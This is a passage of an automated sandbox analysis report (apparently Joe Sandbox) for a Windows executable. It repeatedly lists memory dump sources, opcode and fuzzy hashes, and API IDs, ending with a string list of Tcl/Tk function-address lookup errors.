                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                          • Opcode ID: 14e965909f7280d7a3652a0ca181d92c694a9cf8fd4ee26df7ecbe6e2bc61af1
                                                                                                                                                                                                                                                                          • Instruction ID: 65f5170f2c9e2317037757afc53222431532b99dc62b673f60c12cd3f07144ff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14e965909f7280d7a3652a0ca181d92c694a9cf8fd4ee26df7ecbe6e2bc61af1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8610D22F1C28346F72CA9ACC85023DF691AF40760FD44235D67D46AE5DE7DE80187A3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                                          • Instruction ID: 33716e855d870d03c9fa04c06d9317dbe72a87a834607f8c4ec06b737b1f7bb0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09518436A18A5381E728AB2DD040628B7A0EB58B58FE45135CEDD077F4CB3AE842C791
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                                          • Instruction ID: 0a9c39b62df7feab7c7d3d1d0233a554d2b292223a75d767cc8dea84b14d4d6b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97518676A1865381E7289F2DC040228B3A4EB49F58FE55231CADD077F4DB3AE843C791
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                                          • Instruction ID: 8fadb960ce1253edc0581cdeddea2c97371187be09562a119bdcd5db710f2ee7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F516036A1965386E728AB2DC040239A3A4EB5CB58FE44135DEDD477E4CB3AEC42C7D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                                          • Instruction ID: c4e4d3c3f0107bdfbb191dd9b6707a37eb5c761648d509e7ef7c8ec3eefabe87
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73517036A1865386E7289B2DD040738B7A5EB8DB58FE44135CE9C177E4CB3AE842C791
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                                          • Instruction ID: fdd97b00f8e6649dc595ad8f9c05790f653fe5d55cebf397b2a563304c26c5c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8151A436A1865285E729AB2DC04123CA7A1EB4DB58FE48131DF9C177F4CB3AE843C791
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                                          • Instruction ID: a03eee61784b7bd99ba4eabc87d73c62a3d7f228c06c07f34f16a911c06f72b1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1516F36B1865386E72C9B2DC040328A7A5EB49B58FE45131CAAD177F4CB3AED43C791
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                          • Instruction ID: 6cc0ac1de8312d24d2a4992d6d40bf799d282654548c0022e62230325dbda997
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A41A252C0E74F44EB6D992C0D006B4A6809F2A7A4FD856B4DDF91B3F6CD1D258AC2A3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
                                                                                                                                                                                                                                                                          • Instruction ID: 6b65d743fd285bf8fd6bb91d2305009591b4a7ea4447831d36d6faffdacef186
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B241F572718A5682EF1CDF2AD914569A3A1E74CFD0B899032EE5D87BA8DE3CD0428351
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
                                                                                                                                                                                                                                                                          • Instruction ID: f25e8446881e5a1faa308c4994a5102f4f264e8e2c9c010eba365b7b1d75fbcf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97dbf60876fcd0633a649bc779bfe1af7a9be6d7cd19397e9a759bc507e901db
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31C931709B4381E76CEF29684117DA6D5AB88B90FC44238EEAD53BE6DF3CD0028355
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                                                                                                                                                                                                                                          • Instruction ID: 0e1009f3354a648cbc5178914f528014046e34166de7ee04c80faa487f0966a1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dada551c461b21fdad657b6bac4cbdfad31b05eb9b59333086b2e0a15b162055
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F0C2B1B182938ADBA99F6CA812629B7D0F7083C1F80C17DE69D87F64C63C80608F55
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                                                                                                                                                                                                                                          • Instruction ID: 92f0a0caf947308148df4444f56f7e3bf0e1eab426a9675fce320f2db028ab9f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5749315d7b24dceccc8714b5042f108a7de79c1631c17c6a95dc8ed6b888950b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AA00165A09807D0E74EAB58A894174A220EB51350BA40031E12D414F09F6CA54287E2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2590889374.00007FF7FBDC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FBDC0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590867740.00007FF7FBDC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590912332.00007FF7FBDEB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBDFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590945030.00007FF7FBE00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2590986768.00007FF7FBE65000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7fbdc0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                                                                                                                          • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                          • API String ID: 190572456-2208601799
                                                                                                                                                                                                                                                                          • Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                                                                                                                                                                                                                                          • Instruction ID: 297828f539353c1f7fb6117a73df6725c8de184ebbffcae65719013770fd4e21
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
